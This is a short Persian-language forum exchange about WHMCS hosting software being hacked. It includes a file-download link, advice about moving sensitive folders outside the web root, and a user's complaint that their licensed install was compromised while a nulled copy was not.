پرشین گیگ - دانلود - Whmcs.rar (http://wdl.persiangig.com/pages/download/?dl=http://sysn3t.persiangig.com/video/Whmcs.rar)

حالا جدا از همه ی این دعوا ها
شما چطوری اون موقع شب بیدار بودی؟ :-؟
ماه رمضون بوده؟ 8-}

شما اومدی تاپیک زیرخاکی بیاری بالا؟!

تیم whmcs یک سال بیشتر میشه که توی آموزشهاش گفته سه تا فولدر حساس رو بیارید خارج روت سایت. اگه کاربرا همین یک مورد رو رعایت می کردن حتی باگ خطرناک دو هفته پیش هم موثر نبود و کسی کاری نمیتونست بکنه

چه ربطی داره به اون پوشه شما مگر تاپیک منو ندیدین که از whmcهک شدم نال شده داشتیم هک نشدیم لایسنس دار نصب شد هک شدیم این تیم اینا چیکار میکنن نمیدنم